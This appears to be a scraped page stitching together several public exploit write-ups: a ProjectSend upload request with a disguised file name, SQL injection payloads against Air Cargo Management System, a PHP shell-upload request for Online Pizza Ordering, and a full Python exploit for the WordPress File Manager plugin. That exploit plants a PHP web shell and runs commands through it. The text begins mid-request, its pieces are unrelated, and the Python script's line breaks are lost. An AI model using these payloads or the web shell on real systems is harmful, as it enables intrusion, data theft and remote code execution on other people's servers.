User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/files-edit.php?ids=34&type=new  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59  
Connection: close

------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="csrf_token"

66540808a4bd64c0f0566e6c20a4bc36c49dfac41172788424c6924b15b18d02  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][id]"

34  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][original]"

openme.sh;.jpg  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][file]"

1674759035-52e51cf3f58377b8a687d49b960a58dfc677f0ad-openmesh.jpg  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][name]"

openme.sh  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][description]"

------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][expiry_date]"

25-02-2023  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="save"

------WebKitFormBoundaryc8btjvyb3An7HcmA--

And it doesn't matter who downloads your file. if it opens then reverse shell will be triggered and rce

private youtube video poc : https://youtu.be/Ln7KluDfnk4

projectSend r1605 Remote Code Execution

A vulnerability has been found in SourceCodester Air Cargo Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/transactions/track_shipment.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224995.

**Air Cargo Management System v1.0 has SQL injection**

BUG\_Author: XiaoJieSec

Website source address:https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html

Vulnerability File: /acms/admin/transactions/track\_shipment.php

GET parameter 'id' exists SQL injection vulnerability

Payload1:id=-1' union all select null,null,null,CONCAT(0x23242526,0x73747576),null-- -

    GET /acms/admin/transactions/track_shipment.php?id=-1%27%20union%20all%20select%20null,null,null,CONCAT(0x23242526,0x73747576),null--%20- HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: revenue[LastUrl]=%2Frates%2Fadmin%2Fsystem_settingslist.php
    Connection: close
    

union query success

Payload2:id=1' and (select 1 from (select(sleep(10)))a) and 'd'='d

    GET /acms/admin/transactions/track_shipment.php?id=1%27%20and%20(select%201%20from%20(select(sleep(10)))a)%20and%20%27d%27=%27d HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: revenue[LastUrl]=%2Frates%2Fadmin%2Fsystem_settingslist.php; PHPSESSID=ajjmkcq73hjl8r1bb7b4smsaob
    Connection: close
    

The response time of the server is greater than 10 seconds

CVE-2023-1856: bug_report/SQLi-1.md at main · Hackergrave/bug_report

Online Pizza Ordering version 1.0 suffers from a remote shell upload vulnerability.

## Title: Online-Pizza-Ordering-1.0 File-Inclusion-RCE  
## Author: nu11secur1ty  
## Date: 03.30.2023  
## Vendor: https://github.com/oretnom23  
## Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html  
## Reference: https://portswigger.net/web-security/file-upload

## Description:  
The malicious user can request an account from the administrator of  
this system.  
Then he can use this vulnerability to destroy or get access to all  
accounts of this system, even more, worst than ever.  
The malicious user can upload a very dangerous file on this server,  
and he can execute it via shell.  
The status is CRITICAL.

STATUS: HIGH Vulnerability

[+]Exploit:  
```mysql  
<?php  
// by nu11secur1ty - 2023  
// Old Name Of The file  
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;

// New Name For The File  
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;

// using rename() function to rename the file  
rename( $old_name, $new_name) ;

?>

```  
[+]Injection_REQUEST:  
```POST  
POST /php-opos/admin/ajax.php?action=save_menu HTTP/1.1  
Host: pwnedhost7.com  
Content-Length: 1050  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111  
Safari/537.36  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Origin: http://pwnedhost7.com  
Referer: http://pwnedhost7.com/php-opos/admin/index.php?page=menu  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=sn639s6euv91mfc9rbef4tdr1p  
Connection: close

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="id"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="name"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="description"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="status"

on  
------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="category_id"

4  
------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="price"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="img"; filename="namebasterd.php"  
Content-Type: application/octet-stream

<?php  
// by nu11secur1ty - 2023  
// Old Name Of The file  
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;

// New Name For The File  
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;

// using rename() function to rename the file  
rename( $old_name, $new_name) ;

?>

------WebKitFormBoundaryt8ceBsdqMkRKDoHX--

```

## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0)

## Proof and Exploit:  
[href](https://streamable.com/szb9qy)

## Time spend:  
00:45:00

Online Pizza Ordering 1.0 Shell Upload

WordPress File Manager plugin versions 6.0 through 6.9 suffer from a remote shell upload vulnerability.

    #!/usr/bin/env# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE# Date: [ 22-01-2023 ]# Exploit Author: [BLY]# Vendor Homepage: [https://wpscan.com/vulnerability/10389]# Version: [ File Manager plugin 6.0-6.9]# Tested on: [ Debian ]# CVE : [ CVE-2020-25213 ]import sys,signal,time,requestsfrom bs4 import BeautifulSoup#from pprint import pprintdef handler(sig,frame):  print ("[!]Saliendo")  sys.exit(1)signal.signal(signal.SIGINT,handler)def commandexec(command):  exec_url = url+"/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"  params = {    "cmd":command  }  r=requests.get(exec_url,params=params)  soup = BeautifulSoup(r.text, 'html.parser')  text = soup.get_text()  print (text)def exploit():  global url  url = sys.argv[1]  command = sys.argv[2]  upload_url = url+"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"  headers = {      'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww",      'Connection': "close"   }  payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--"  try:    r=requests.post(upload_url,data=payload,headers=headers)    #pprint(r.json())    commandexec(command)  except:    print("[!] Algo ha salido mal...")def help():  print ("\n[*] Uso: python3",sys.argv[0],"\"url\" \"comando\"")  print ("[!] Ejemplo: python3",sys.argv[0],"http://wordpress.local/ id")if __name__ == '__main__':  if len(sys.argv) != 3:    help()  else:    exploit()

Tag

#webkit